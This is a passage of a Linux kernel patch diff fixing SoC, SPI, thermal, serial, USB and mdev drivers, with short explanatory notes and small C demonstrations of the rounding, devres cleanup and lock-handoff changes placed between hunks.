+@@ -39,6 +39,7 @@ config QE_TDM
+ 
+ config QE_USB
+ 	bool
++	depends on QUICC_ENGINE
+ 	default y if USB_FSL_QE
+ 	help
+ 	  QE USB Controller support
+diff --git a/drivers/soc/mediatek/mtk-svs.c b/drivers/soc/mediatek/mtk-svs.c
+index e55fb16fdc5ac..f00cd5c723499 100644
+--- a/drivers/soc/mediatek/mtk-svs.c
++++ b/drivers/soc/mediatek/mtk-svs.c
+@@ -2114,9 +2114,9 @@ static int svs_mt8192_platform_probe(struct svs_platform *svsp)
+ 		svsb = &svsp->banks[idx];
+ 
+ 		if (svsb->type == SVSB_HIGH)
+-			svsb->opp_dev = svs_add_device_link(svsp, "mali");
++			svsb->opp_dev = svs_add_device_link(svsp, "gpu");
+ 		else if (svsb->type == SVSB_LOW)
+-			svsb->opp_dev = svs_get_subsys_device(svsp, "mali");
++			svsb->opp_dev = svs_get_subsys_device(svsp, "gpu");
+ 
+ 		if (IS_ERR(svsb->opp_dev))
+ 			return dev_err_probe(svsp->dev, PTR_ERR(svsb->opp_dev),
+diff --git a/drivers/soc/xilinx/xlnx_event_manager.c b/drivers/soc/xilinx/xlnx_event_manager.c
+index c76381899ef49..f9d9b82b562da 100644
+--- a/drivers/soc/xilinx/xlnx_event_manager.c
++++ b/drivers/soc/xilinx/xlnx_event_manager.c
+@@ -192,11 +192,12 @@ static int xlnx_remove_cb_for_suspend(event_cb_func_t cb_fun)
+ 	struct registered_event_data *eve_data;
+ 	struct agent_cb *cb_pos;
+ 	struct agent_cb *cb_next;
++	struct hlist_node *tmp;
+ 
+ 	is_need_to_unregister = false;
+ 
+ 	/* Check for existing entry in hash table for given cb_type */
+-	hash_for_each_possible(reg_driver_map, eve_data, hentry, PM_INIT_SUSPEND_CB) {
++	hash_for_each_possible_safe(reg_driver_map, eve_data, tmp, hentry, PM_INIT_SUSPEND_CB) {
+ 		if (eve_data->cb_type == PM_INIT_SUSPEND_CB) {
+ 			/* Delete the list of callback */
+ 			list_for_each_entry_safe(cb_pos, cb_next, &eve_data->cb_list_head, list) {
+@@ -228,11 +229,12 @@ static int xlnx_remove_cb_for_notify_event(const u32 node_id, const u32 event,
+ 	u64 key = ((u64)node_id << 32U) | (u64)event;
+ 	struct agent_cb *cb_pos;
+ 	struct agent_cb *cb_next;
++	struct hlist_node *tmp;
+ 
+ 	is_need_to_unregister = false;
+ 
+ 	/* Check for existing entry in hash table for given key id */
+-	hash_for_each_possible(reg_driver_map, eve_data, hentry, key) {
++	hash_for_each_possible_safe(reg_driver_map, eve_data, tmp, hentry, key) {
+ 		if (eve_data->key == key) {
+ 			/* Delete the list of callback */
+ 			list_for_each_entry_safe(cb_pos, cb_next, &eve_data->cb_list_head, list) {
+diff --git a/drivers/spi/spi-bcm-qspi.c b/drivers/spi/spi-bcm-qspi.c
+index cad2d55dcd3d2..137e7315a3cfd 100644
+--- a/drivers/spi/spi-bcm-qspi.c
++++ b/drivers/spi/spi-bcm-qspi.c
+@@ -1543,13 +1543,9 @@ int bcm_qspi_probe(struct platform_device *pdev,
+ 		res = platform_get_resource_byname(pdev, IORESOURCE_MEM,
+ 						   "mspi");
+ 
+-	if (res) {
+-		qspi->base[MSPI]  = devm_ioremap_resource(dev, res);
+-		if (IS_ERR(qspi->base[MSPI]))
+-			return PTR_ERR(qspi->base[MSPI]);
+-	} else {
+-		return 0;
+-	}
++	qspi->base[MSPI]  = devm_ioremap_resource(dev, res);
++	if (IS_ERR(qspi->base[MSPI]))
++		return PTR_ERR(qspi->base[MSPI]);
+ 
+ 	res = platform_get_resource_byname(pdev, IORESOURCE_MEM, "bspi");
+ 	if (res) {
+diff --git a/drivers/spi/spi-dw-core.c b/drivers/spi/spi-dw-core.c
+index c3bfb6c84cab2..4976e3b8923ee 100644
+--- a/drivers/spi/spi-dw-core.c
++++ b/drivers/spi/spi-dw-core.c
+@@ -426,7 +426,10 @@ static int dw_spi_transfer_one(struct spi_controller *master,
+ 	int ret;
+ 
+ 	dws->dma_mapped = 0;
+-	dws->n_bytes = DIV_ROUND_UP(transfer->bits_per_word, BITS_PER_BYTE);
++	dws->n_bytes =
++		roundup_pow_of_two(DIV_ROUND_UP(transfer->bits_per_word,
++						BITS_PER_BYTE));
++
+ 	dws->tx = (void *)transfer->tx_buf;
+ 	dws->tx_len = transfer->len / dws->n_bytes;
+ 	dws->rx = transfer->rx_buf;
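The spi-dw change matters for word sizes between 17 and 24 bits: DIV_ROUND_UP(bits, 8) yields 3 bytes, but FIFO accesses must use a power-of-two width, so the value is rounded up to 4. A quick check of the arithmetic (the rounding helper is reimplemented here for illustration; the kernel provides roundup_pow_of_two()):

#include <assert.h>
#include <stdio.h>

#define DIV_ROUND_UP(n, d)	(((n) + (d) - 1) / (d))

static unsigned int roundup_pow_of_two(unsigned int n)
{
	unsigned int p = 1;

	while (p < n)
		p <<= 1;
	return p;
}

int main(void)
{
	assert(roundup_pow_of_two(DIV_ROUND_UP(8, 8)) == 1);
	assert(roundup_pow_of_two(DIV_ROUND_UP(16, 8)) == 2);
	/* 17..24 bits per word: 3 bytes, rounded up to a 4-byte access. */
	assert(roundup_pow_of_two(DIV_ROUND_UP(24, 8)) == 4);
	assert(roundup_pow_of_two(DIV_ROUND_UP(32, 8)) == 4);
	puts("n_bytes rounding ok");
	return 0;
}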
+diff --git a/drivers/spi/spi-geni-qcom.c b/drivers/spi/spi-geni-qcom.c
+index dd1581893fe72..7b76dcd11e2bb 100644
+--- a/drivers/spi/spi-geni-qcom.c
++++ b/drivers/spi/spi-geni-qcom.c
+@@ -35,7 +35,7 @@
+ #define CS_DEMUX_OUTPUT_SEL	GENMASK(3, 0)
+ 
+ #define SE_SPI_TRANS_CFG	0x25c
+-#define CS_TOGGLE		BIT(0)
++#define CS_TOGGLE		BIT(1)
+ 
+ #define SE_SPI_WORD_LEN		0x268
+ #define WORD_LEN_MSK		GENMASK(9, 0)
+@@ -979,6 +979,12 @@ static int spi_geni_probe(struct platform_device *pdev)
+ 	if (mas->cur_xfer_mode == GENI_SE_FIFO)
+ 		spi->set_cs = spi_geni_set_cs;
+ 
++	/*
++	 * TX is required per GSI spec, see setup_gsi_xfer().
++	 */
++	if (mas->cur_xfer_mode == GENI_GPI_DMA)
++		spi->flags = SPI_CONTROLLER_MUST_TX;
++
+ 	ret = request_irq(mas->irq, geni_spi_isr, 0, dev_name(dev), spi);
+ 	if (ret)
+ 		goto spi_geni_release_dma;
+diff --git a/drivers/staging/media/atomisp/pci/atomisp_gmin_platform.c b/drivers/staging/media/atomisp/pci/atomisp_gmin_platform.c
+index 3d41fab661cf0..789b13db80b2f 100644
+--- a/drivers/staging/media/atomisp/pci/atomisp_gmin_platform.c
++++ b/drivers/staging/media/atomisp/pci/atomisp_gmin_platform.c
+@@ -1280,7 +1280,7 @@ static int gmin_get_config_dsm_var(struct device *dev,
+ 	dev_info(dev, "found _DSM entry for '%s': %s\n", var,
+ 		 cur->string.pointer);
+ 	strscpy(out, cur->string.pointer, *out_len);
+-	*out_len = strlen(cur->string.pointer);
++	*out_len = strlen(out);
+ 
+ 	ACPI_FREE(obj);
+ 	return 0;
+diff --git a/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.c b/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.c
+index dc33490ba7fbb..705c5e283c27b 100644
+--- a/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.c
++++ b/drivers/staging/vc04_services/interface/vchiq_arm/vchiq_arm.c
+@@ -415,7 +415,7 @@ free_pagelist(struct vchiq_instance *instance, struct vchiq_pagelist_info *pagel
+ 	pagelistinfo->scatterlist_mapped = 0;
+ 
+ 	/* Deal with any partial cache lines (fragments) */
+-	if (pagelist->type >= PAGELIST_READ_WITH_FRAGMENTS) {
++	if (pagelist->type >= PAGELIST_READ_WITH_FRAGMENTS && g_fragments_base) {
+ 		char *fragments = g_fragments_base +
+ 			(pagelist->type - PAGELIST_READ_WITH_FRAGMENTS) *
+ 			g_fragments_size;
+@@ -462,7 +462,7 @@ free_pagelist(struct vchiq_instance *instance, struct vchiq_pagelist_info *pagel
+ 	cleanup_pagelistinfo(instance, pagelistinfo);
+ }
+ 
+-int vchiq_platform_init(struct platform_device *pdev, struct vchiq_state *state)
++static int vchiq_platform_init(struct platform_device *pdev, struct vchiq_state *state)
+ {
+ 	struct device *dev = &pdev->dev;
+ 	struct vchiq_drvdata *drvdata = platform_get_drvdata(pdev);
+diff --git a/drivers/thermal/sun8i_thermal.c b/drivers/thermal/sun8i_thermal.c
+index e64d06d1328ce..80614b6adfac5 100644
+--- a/drivers/thermal/sun8i_thermal.c
++++ b/drivers/thermal/sun8i_thermal.c
+@@ -319,6 +319,11 @@ out:
+ 	return ret;
+ }
+ 
++static void sun8i_ths_reset_control_assert(void *data)
++{
++	reset_control_assert(data);
++}
++
+ static int sun8i_ths_resource_init(struct ths_device *tmdev)
+ {
+ 	struct device *dev = tmdev->dev;
+@@ -339,47 +344,35 @@ static int sun8i_ths_resource_init(struct ths_device *tmdev)
+ 		if (IS_ERR(tmdev->reset))
+ 			return PTR_ERR(tmdev->reset);
+ 
+-		tmdev->bus_clk = devm_clk_get(&pdev->dev, "bus");
++		ret = reset_control_deassert(tmdev->reset);
++		if (ret)
++			return ret;
++
++		ret = devm_add_action_or_reset(dev, sun8i_ths_reset_control_assert,
++					       tmdev->reset);
++		if (ret)
++			return ret;
++
++		tmdev->bus_clk = devm_clk_get_enabled(&pdev->dev, "bus");
+ 		if (IS_ERR(tmdev->bus_clk))
+ 			return PTR_ERR(tmdev->bus_clk);
+ 	}
+ 
+ 	if (tmdev->chip->has_mod_clk) {
+-		tmdev->mod_clk = devm_clk_get(&pdev->dev, "mod");
++		tmdev->mod_clk = devm_clk_get_enabled(&pdev->dev, "mod");
+ 		if (IS_ERR(tmdev->mod_clk))
+ 			return PTR_ERR(tmdev->mod_clk);
+ 	}
+ 
+-	ret = reset_control_deassert(tmdev->reset);
+-	if (ret)
+-		return ret;
+-
+-	ret = clk_prepare_enable(tmdev->bus_clk);
+-	if (ret)
+-		goto assert_reset;
+-
+ 	ret = clk_set_rate(tmdev->mod_clk, 24000000);
+ 	if (ret)
+-		goto bus_disable;
+-
+-	ret = clk_prepare_enable(tmdev->mod_clk);
+-	if (ret)
+-		goto bus_disable;
++		return ret;
+ 
+ 	ret = sun8i_ths_calibrate(tmdev);
+ 	if (ret)
+-		goto mod_disable;
++		return ret;
+ 
+ 	return 0;
+-
+-mod_disable:
+-	clk_disable_unprepare(tmdev->mod_clk);
+-bus_disable:
+-	clk_disable_unprepare(tmdev->bus_clk);
+-assert_reset:
+-	reset_control_assert(tmdev->reset);
+-
+-	return ret;
+ }
+ 
+ static int sun8i_h3_thermal_init(struct ths_device *tmdev)
+@@ -530,17 +523,6 @@ static int sun8i_ths_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int sun8i_ths_remove(struct platform_device *pdev)
+-{
+-	struct ths_device *tmdev = platform_get_drvdata(pdev);
+-
+-	clk_disable_unprepare(tmdev->mod_clk);
+-	clk_disable_unprepare(tmdev->bus_clk);
+-	reset_control_assert(tmdev->reset);
+-
+-	return 0;
+-}
+-
+ static const struct ths_thermal_chip sun8i_a83t_ths = {
+ 	.sensor_num = 3,
+ 	.scale = 705,
+@@ -642,7 +624,6 @@ MODULE_DEVICE_TABLE(of, of_ths_match);
+ 
+ static struct platform_driver ths_driver = {
+ 	.probe = sun8i_ths_probe,
+-	.remove = sun8i_ths_remove,
+ 	.driver = {
+ 		.name = "sun8i-thermal",
+ 		.of_match_table = of_ths_match,
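The sun8i_thermal rework drops the hand-rolled error unwinding and the .remove callback in favour of device-managed helpers: devm_clk_get_enabled() and devm_add_action_or_reset() register the undo step at acquire time, and cleanup then runs automatically in reverse order. A userspace sketch of that register-the-undo idea (the tiny action stack below is an illustration, not the kernel devres machinery):

#include <stdio.h>

#define MAX_ACTIONS 8

struct action { void (*fn)(void *); void *data; };

static struct action actions[MAX_ACTIONS];
static int nr_actions;

static int add_action(void (*fn)(void *), void *data)
{
	if (nr_actions == MAX_ACTIONS) {
		fn(data);	/* ..._or_reset: undo immediately on failure */
		return -1;
	}
	actions[nr_actions].fn = fn;
	actions[nr_actions++].data = data;
	return 0;
}

static void run_actions(void)
{
	while (nr_actions-- > 0)	/* reverse order, like devres */
		actions[nr_actions].fn(actions[nr_actions].data);
}

static void release(void *data)
{
	printf("released %s\n", (const char *)data);
}

int main(void)
{
	add_action(release, "reset-line");
	add_action(release, "bus-clock");
	run_actions();		/* bus-clock first, then reset-line */
	return 0;
}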
+diff --git a/drivers/tty/serial/8250/8250_omap.c b/drivers/tty/serial/8250/8250_omap.c
+index 3f33014022f0e..adc85e250822c 100644
+--- a/drivers/tty/serial/8250/8250_omap.c
++++ b/drivers/tty/serial/8250/8250_omap.c
+@@ -639,6 +639,8 @@ static irqreturn_t omap8250_irq(int irq, void *dev_id)
+ 	if ((lsr & UART_LSR_OE) && up->overrun_backoff_time_ms > 0) {
+ 		unsigned long delay;
+ 
++		/* Synchronize UART_IER access against the console. */
++		spin_lock(&port->lock);
+ 		up->ier = port->serial_in(port, UART_IER);
+ 		if (up->ier & (UART_IER_RLSI | UART_IER_RDI)) {
+ 			port->ops->stop_rx(port);
+@@ -648,6 +650,7 @@ static irqreturn_t omap8250_irq(int irq, void *dev_id)
+ 			 */
+ 			cancel_delayed_work(&up->overrun_backoff);
+ 		}
++		spin_unlock(&port->lock);
+ 
+ 		delay = msecs_to_jiffies(up->overrun_backoff_time_ms);
+ 		schedule_delayed_work(&up->overrun_backoff, delay);
+@@ -1453,7 +1456,9 @@ static int omap8250_probe(struct platform_device *pdev)
+ err:
+ 	pm_runtime_dont_use_autosuspend(&pdev->dev);
+ 	pm_runtime_put_sync(&pdev->dev);
++	flush_work(&priv->qos_work);
+ 	pm_runtime_disable(&pdev->dev);
++	cpu_latency_qos_remove_request(&priv->pm_qos_request);
+ 	return ret;
+ }
+ 
+@@ -1500,25 +1505,35 @@ static int omap8250_suspend(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
+ 	struct uart_8250_port *up = serial8250_get_port(priv->line);
++	int err;
+ 
+ 	serial8250_suspend_port(priv->line);
+ 
+-	pm_runtime_get_sync(dev);
++	err = pm_runtime_resume_and_get(dev);
++	if (err)
++		return err;
+ 	if (!device_may_wakeup(dev))
+ 		priv->wer = 0;
+ 	serial_out(up, UART_OMAP_WER, priv->wer);
+-	pm_runtime_mark_last_busy(dev);
+-	pm_runtime_put_autosuspend(dev);
+-
++	err = pm_runtime_force_suspend(dev);
+ 	flush_work(&priv->qos_work);
+-	return 0;
++
++	return err;
+ }
+ 
+ static int omap8250_resume(struct device *dev)
+ {
+ 	struct omap8250_priv *priv = dev_get_drvdata(dev);
++	int err;
+ 
++	err = pm_runtime_force_resume(dev);
++	if (err)
++		return err;
+ 	serial8250_resume_port(priv->line);
++	/* Paired with pm_runtime_resume_and_get() in omap8250_suspend() */
++	pm_runtime_mark_last_busy(dev);
++	pm_runtime_put_autosuspend(dev);
++
+ 	return 0;
+ }
+ #else
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 1093c74b52840..f6d0ea2c6be4b 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -2627,6 +2627,7 @@ OF_EARLYCON_DECLARE(lpuart, "fsl,vf610-lpuart", lpuart_early_console_setup);
+ OF_EARLYCON_DECLARE(lpuart32, "fsl,ls1021a-lpuart", lpuart32_early_console_setup);
+ OF_EARLYCON_DECLARE(lpuart32, "fsl,ls1028a-lpuart", ls1028a_early_console_setup);
+ OF_EARLYCON_DECLARE(lpuart32, "fsl,imx7ulp-lpuart", lpuart32_imx_early_console_setup);
++OF_EARLYCON_DECLARE(lpuart32, "fsl,imx8ulp-lpuart", lpuart32_imx_early_console_setup);
+ OF_EARLYCON_DECLARE(lpuart32, "fsl,imx8qxp-lpuart", lpuart32_imx_early_console_setup);
+ OF_EARLYCON_DECLARE(lpuart32, "fsl,imxrt1050-lpuart", lpuart32_imx_early_console_setup);
+ EARLYCON_DECLARE(lpuart, lpuart_early_console_setup);
+diff --git a/drivers/tty/serial/serial_core.c b/drivers/tty/serial/serial_core.c
+index 23a7ab0de4445..2cc5c68c8689f 100644
+--- a/drivers/tty/serial/serial_core.c
++++ b/drivers/tty/serial/serial_core.c
+@@ -2334,8 +2334,11 @@ int uart_suspend_port(struct uart_driver *drv, struct uart_port *uport)
+ 	 * able to Re-start_rx later.
+ 	 */
+ 	if (!console_suspend_enabled && uart_console(uport)) {
+-		if (uport->ops->start_rx)
++		if (uport->ops->start_rx) {
++			spin_lock_irq(&uport->lock);
+ 			uport->ops->stop_rx(uport);
++			spin_unlock_irq(&uport->lock);
++		}
+ 		goto unlock;
+ 	}
+ 
+@@ -2428,8 +2431,11 @@ int uart_resume_port(struct uart_driver *drv, struct uart_port *uport)
+ 		if (console_suspend_enabled)
+ 			uart_change_pm(state, UART_PM_STATE_ON);
+ 		uport->ops->set_termios(uport, &termios, NULL);
+-		if (!console_suspend_enabled && uport->ops->start_rx)
++		if (!console_suspend_enabled && uport->ops->start_rx) {
++			spin_lock_irq(&uport->lock);
+ 			uport->ops->start_rx(uport);
++			spin_unlock_irq(&uport->lock);
++		}
+ 		if (console_suspend_enabled)
+ 			console_start(uport->cons);
+ 	}
+diff --git a/drivers/usb/core/devio.c b/drivers/usb/core/devio.c
+index 984de3f5e8eb9..4184cd65a6aac 100644
+--- a/drivers/usb/core/devio.c
++++ b/drivers/usb/core/devio.c
+@@ -747,6 +747,7 @@ static int driver_resume(struct usb_interface *intf)
+ 	return 0;
+ }
+ 
++#ifdef CONFIG_PM
+ /* The following routines apply to the entire device, not interfaces */
+ void usbfs_notify_suspend(struct usb_device *udev)
+ {
+@@ -765,6 +766,7 @@ void usbfs_notify_resume(struct usb_device *udev)
+ 	}
+ 	mutex_unlock(&usbfs_mutex);
+ }
++#endif
+ 
+ struct usb_driver usbfs_driver = {
+ 	.name =		"usbfs",
+diff --git a/drivers/usb/dwc2/platform.c b/drivers/usb/dwc2/platform.c
+index 0c02ef7628fd5..58f53faab340f 100644
+--- a/drivers/usb/dwc2/platform.c
++++ b/drivers/usb/dwc2/platform.c
+@@ -175,6 +175,11 @@ int dwc2_lowlevel_hw_disable(struct dwc2_hsotg *hsotg)
+ 	return ret;
+ }
+ 
++static void dwc2_reset_control_assert(void *data)
++{
++	reset_control_assert(data);
++}
++
+ static int dwc2_lowlevel_hw_init(struct dwc2_hsotg *hsotg)
+ {
+ 	int i, ret;
+@@ -185,6 +190,10 @@ static int dwc2_lowlevel_hw_init(struct dwc2_hsotg *hsotg)
+ 				     "error getting reset control\n");
+ 
+ 	reset_control_deassert(hsotg->reset);
++	ret = devm_add_action_or_reset(hsotg->dev, dwc2_reset_control_assert,
++				       hsotg->reset);
++	if (ret)
++		return ret;
+ 
+ 	hsotg->reset_ecc = devm_reset_control_get_optional(hsotg->dev, "dwc2-ecc");
+ 	if (IS_ERR(hsotg->reset_ecc))
+@@ -192,6 +201,10 @@ static int dwc2_lowlevel_hw_init(struct dwc2_hsotg *hsotg)
+ 				     "error getting reset control for ecc\n");
+ 
+ 	reset_control_deassert(hsotg->reset_ecc);
++	ret = devm_add_action_or_reset(hsotg->dev, dwc2_reset_control_assert,
++				       hsotg->reset_ecc);
++	if (ret)
++		return ret;
+ 
+ 	/*
+ 	 * Attempt to find a generic PHY, then look for an old style
+@@ -306,10 +319,7 @@ static int dwc2_driver_remove(struct platform_device *dev)
+ 	if (hsotg->ll_hw_enabled)
+ 		dwc2_lowlevel_hw_disable(hsotg);
+ 
+-	reset_control_assert(hsotg->reset);
+-	reset_control_assert(hsotg->reset_ecc);
+-
+-	return ret;
++	return 0;
+ }
+ 
+ /**
+diff --git a/drivers/usb/dwc3/dwc3-meson-g12a.c b/drivers/usb/dwc3/dwc3-meson-g12a.c
+index b282ad0e69c6d..eaea944ebd2ce 100644
+--- a/drivers/usb/dwc3/dwc3-meson-g12a.c
++++ b/drivers/usb/dwc3/dwc3-meson-g12a.c
+@@ -805,7 +805,7 @@ static int dwc3_meson_g12a_probe(struct platform_device *pdev)
+ 
+ 	ret = dwc3_meson_g12a_otg_init(pdev, priv);
+ 	if (ret)
+-		goto err_phys_power;
++		goto err_plat_depopulate;
+ 
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+@@ -813,6 +813,9 @@ static int dwc3_meson_g12a_probe(struct platform_device *pdev)
+ 
+ 	return 0;
+ 
++err_plat_depopulate:
++	of_platform_depopulate(dev);
++
+ err_phys_power:
+ 	for (i = 0 ; i < PHY_COUNT ; ++i)
+ 		phy_power_off(priv->phys[i]);
+diff --git a/drivers/usb/dwc3/dwc3-qcom.c b/drivers/usb/dwc3/dwc3-qcom.c
+index 79b22abf97276..72c22851d7eef 100644
+--- a/drivers/usb/dwc3/dwc3-qcom.c
++++ b/drivers/usb/dwc3/dwc3-qcom.c
+@@ -800,6 +800,7 @@ static int dwc3_qcom_probe(struct platform_device *pdev)
+ 	struct device		*dev = &pdev->dev;
+ 	struct dwc3_qcom	*qcom;
+ 	struct resource		*res, *parent_res = NULL;
++	struct resource		local_res;
+ 	int			ret, i;
+ 	bool			ignore_pipe_clk;
+ 	bool			wakeup_source;
+@@ -851,9 +852,8 @@ static int dwc3_qcom_probe(struct platform_device *pdev)
+ 	if (np) {
+ 		parent_res = res;
+ 	} else {
+-		parent_res = kmemdup(res, sizeof(struct resource), GFP_KERNEL);
+-		if (!parent_res)
+-			return -ENOMEM;
++		memcpy(&local_res, res, sizeof(struct resource));
++		parent_res = &local_res;
+ 
+ 		parent_res->start = res->start +
+ 			qcom->acpi_pdata->qscratch_base_offset;
+@@ -865,9 +865,10 @@ static int dwc3_qcom_probe(struct platform_device *pdev)
+ 			if (IS_ERR_OR_NULL(qcom->urs_usb)) {
+ 				dev_err(dev, "failed to create URS USB platdev\n");
+ 				if (!qcom->urs_usb)
+-					return -ENODEV;
++					ret = -ENODEV;
+ 				else
+-					return PTR_ERR(qcom->urs_usb);
++					ret = PTR_ERR(qcom->urs_usb);
++				goto clk_disable;
+ 			}
+ 		}
+ 	}
+@@ -950,11 +951,15 @@ reset_assert:
+ static int dwc3_qcom_remove(struct platform_device *pdev)
+ {
+ 	struct dwc3_qcom *qcom = platform_get_drvdata(pdev);
++	struct device_node *np = pdev->dev.of_node;
+ 	struct device *dev = &pdev->dev;
+ 	int i;
+ 
+ 	device_remove_software_node(&qcom->dwc3->dev);
+-	of_platform_depopulate(dev);
++	if (np)
++		of_platform_depopulate(&pdev->dev);
++	else
++		platform_device_put(pdev);
+ 
+ 	for (i = qcom->num_clocks - 1; i >= 0; i--) {
+ 		clk_disable_unprepare(qcom->clks[i]);
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 7e94d31687e9e..c3590a0c42035 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -2631,7 +2631,9 @@ static int dwc3_gadget_pullup(struct usb_gadget *g, int is_on)
+ 	ret = pm_runtime_get_sync(dwc->dev);
+ 	if (!ret || ret < 0) {
+ 		pm_runtime_put(dwc->dev);
+-		return 0;
++		if (ret < 0)
++			pm_runtime_set_suspended(dwc->dev);
++		return ret;
+ 	}
+ 
+ 	if (dwc->pullups_connected == is_on) {
+diff --git a/drivers/usb/gadget/function/u_serial.c b/drivers/usb/gadget/function/u_serial.c
+index db6fd0238d4b4..ea2c5b6cde8cd 100644
+--- a/drivers/usb/gadget/function/u_serial.c
++++ b/drivers/usb/gadget/function/u_serial.c
+@@ -1419,10 +1419,19 @@ EXPORT_SYMBOL_GPL(gserial_disconnect);
+ 
+ void gserial_suspend(struct gserial *gser)
+ {
+-	struct gs_port	*port = gser->ioport;
++	struct gs_port	*port;
+ 	unsigned long	flags;
+ 
+-	spin_lock_irqsave(&port->port_lock, flags);
++	spin_lock_irqsave(&serial_port_lock, flags);
++	port = gser->ioport;
++
++	if (!port) {
++		spin_unlock_irqrestore(&serial_port_lock, flags);
++		return;
++	}
++
++	spin_lock(&port->port_lock);
++	spin_unlock(&serial_port_lock);
+ 	port->suspended = true;
+ 	spin_unlock_irqrestore(&port->port_lock, flags);
+ }
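The gserial_suspend() change closes a race where gser->ioport can go NULL during disconnect: the global serial_port_lock is taken first to validate the pointer, the per-port lock is acquired while still holding it, and only then is the global lock released. A pthread sketch of that lock-handoff shape (names hypothetical):

#include <pthread.h>
#include <stddef.h>
#include <stdio.h>

static pthread_mutex_t serial_port_lock = PTHREAD_MUTEX_INITIALIZER;

struct gs_port {
	pthread_mutex_t port_lock;
	int suspended;
};

struct gserial { struct gs_port *ioport; };

static void gserial_suspend(struct gserial *gser)
{
	struct gs_port *port;

	pthread_mutex_lock(&serial_port_lock);
	port = gser->ioport;		/* read under the global lock */
	if (!port) {
		pthread_mutex_unlock(&serial_port_lock);
		return;			/* already disconnected */
	}
	pthread_mutex_lock(&port->port_lock);	 /* handoff: nest, then.. */
	pthread_mutex_unlock(&serial_port_lock); /* ..drop the global one */
	port->suspended = 1;
	pthread_mutex_unlock(&port->port_lock);
}

int main(void)
{
	struct gs_port p = { PTHREAD_MUTEX_INITIALIZER, 0 };
	struct gserial g = { &p };

	gserial_suspend(&g);
	printf("suspended=%d\n", p.suspended);
	g.ioport = NULL;
	gserial_suspend(&g);		/* safe no-op */
	return 0;
}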
+diff --git a/drivers/usb/phy/phy-tahvo.c b/drivers/usb/phy/phy-tahvo.c
+index f2d2cc586c5b7..da63d7e4d2709 100644
+--- a/drivers/usb/phy/phy-tahvo.c
++++ b/drivers/usb/phy/phy-tahvo.c
+@@ -391,7 +391,7 @@ static int tahvo_usb_probe(struct platform_device *pdev)
+ 
+ 	tu->irq = ret = platform_get_irq(pdev, 0);
+ 	if (ret < 0)
+-		return ret;
++		goto err_remove_phy;
+ 	ret = request_threaded_irq(tu->irq, NULL, tahvo_usb_vbus_interrupt,
+ 				   IRQF_ONESHOT,
+ 				   "tahvo-vbus", tu);
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index e12fec4c2e2f2..6692440c1e0a3 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -1151,6 +1151,10 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE(QUALCOMM_VENDOR_ID, 0x90fa),
+ 	  .driver_info = RSVD(3) },
+ 	/* u-blox products */
++	{ USB_DEVICE(UBLOX_VENDOR_ID, 0x1311) },	/* u-blox LARA-R6 01B */
++	{ USB_DEVICE(UBLOX_VENDOR_ID, 0x1312),		/* u-blox LARA-R6 01B (RMNET) */
++	  .driver_info = RSVD(4) },
++	{ USB_DEVICE_INTERFACE_CLASS(UBLOX_VENDOR_ID, 0x1313, 0xff) },	/* u-blox LARA-R6 01B (ECM) */
+ 	{ USB_DEVICE(UBLOX_VENDOR_ID, 0x1341) },	/* u-blox LARA-L6 */
+ 	{ USB_DEVICE(UBLOX_VENDOR_ID, 0x1342),		/* u-blox LARA-L6 (RMNET) */
+ 	  .driver_info = RSVD(4) },
+diff --git a/drivers/usb/typec/ucsi/psy.c b/drivers/usb/typec/ucsi/psy.c
+index 56bf56517f75a..384b42267f1fc 100644
+--- a/drivers/usb/typec/ucsi/psy.c
++++ b/drivers/usb/typec/ucsi/psy.c
+@@ -27,8 +27,20 @@ static enum power_supply_property ucsi_psy_props[] = {
+ 	POWER_SUPPLY_PROP_VOLTAGE_NOW,
+ 	POWER_SUPPLY_PROP_CURRENT_MAX,
+ 	POWER_SUPPLY_PROP_CURRENT_NOW,
++	POWER_SUPPLY_PROP_SCOPE,
+ };
+ 
++static int ucsi_psy_get_scope(struct ucsi_connector *con,
++			      union power_supply_propval *val)
++{
++	u8 scope = POWER_SUPPLY_SCOPE_UNKNOWN;
++	struct device *dev = con->ucsi->dev;
++
++	device_property_read_u8(dev, "scope", &scope);
++	val->intval = scope;
++	return 0;
++}
++
+ static int ucsi_psy_get_online(struct ucsi_connector *con,
+ 			       union power_supply_propval *val)
+ {
+@@ -194,6 +206,8 @@ static int ucsi_psy_get_prop(struct power_supply *psy,
+ 		return ucsi_psy_get_current_max(con, val);
+ 	case POWER_SUPPLY_PROP_CURRENT_NOW:
+ 		return ucsi_psy_get_current_now(con, val);
++	case POWER_SUPPLY_PROP_SCOPE:
++		return ucsi_psy_get_scope(con, val);
+ 	default:
+ 		return -EINVAL;
+ 	}
+diff --git a/drivers/vfio/mdev/mdev_core.c b/drivers/vfio/mdev/mdev_core.c
+index 58f91b3bd670c..ed4737de45289 100644
+--- a/drivers/vfio/mdev/mdev_core.c
++++ b/drivers/vfio/mdev/mdev_core.c
+@@ -72,12 +72,6 @@ int mdev_register_parent(struct mdev_parent *parent, struct device *dev,
+ 	parent->nr_types = nr_types;
+ 	atomic_set(&parent->available_instances, mdev_driver->max_instances);
+ 
+-	if (!mdev_bus_compat_class) {
+-		mdev_bus_compat_class = class_compat_register("mdev_bus");
+-		if (!mdev_bus_compat_class)
+-			return -ENOMEM;
+-	}
+-
+ 	ret = parent_create_sysfs_files(parent);
+ 	if (ret)
+ 		return ret;
+@@ -251,13 +245,24 @@ int mdev_device_remove(struct mdev_device *mdev)
+ 
+ static int __init mdev_init(void)
+ {
+-	return bus_register(&mdev_bus_type);
++	int ret;
++
++	ret = bus_register(&mdev_bus_type);
++	if (ret)
++		return ret;
++
++	mdev_bus_compat_class = class_compat_register("mdev_bus");
++	if (!mdev_bus_compat_class) {
